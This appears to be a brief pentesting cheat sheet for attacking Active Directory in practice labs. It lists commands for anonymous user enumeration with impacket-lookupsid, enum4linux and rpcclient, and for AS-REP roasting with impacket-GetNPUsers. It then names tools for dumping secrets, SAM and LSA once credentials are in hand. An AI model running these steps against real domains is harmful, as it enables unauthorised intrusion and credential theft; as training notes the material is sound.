Active Directory Security
PRACTICE ! PRACTICE ! PRACTICE !
Enumerating the Usernames first !
If anonymous user has READ permissions over the $IPC share, then
$ impacket-lookupsid anonymous@10.10.117.62 | tee users.txt
Meanwhile, run the enum4linux in the background
$ enum4linux -a 10.10.10.x | tee enum4linux.log
If rpcclient has anonymous login then
rpcclient $> enumdomusers
rpcclient $> enumdomgroups

AS-REP Roasting
After finding valid usernames, try to check if there is any way to AS-REP roast
$ impacket-GetNPUsers spooky.local/ -no-pass -usersfile users.txt -dc-ip <target ip>
After Having Creds
Enumerate Shares with those creds -
cme
Try dumping the secrets with it -
impacket-secretsdump
Try dumping the sam and lass -
crackmapexec
Check for winrm, smb and other services till it gets Pwn3d
Last updated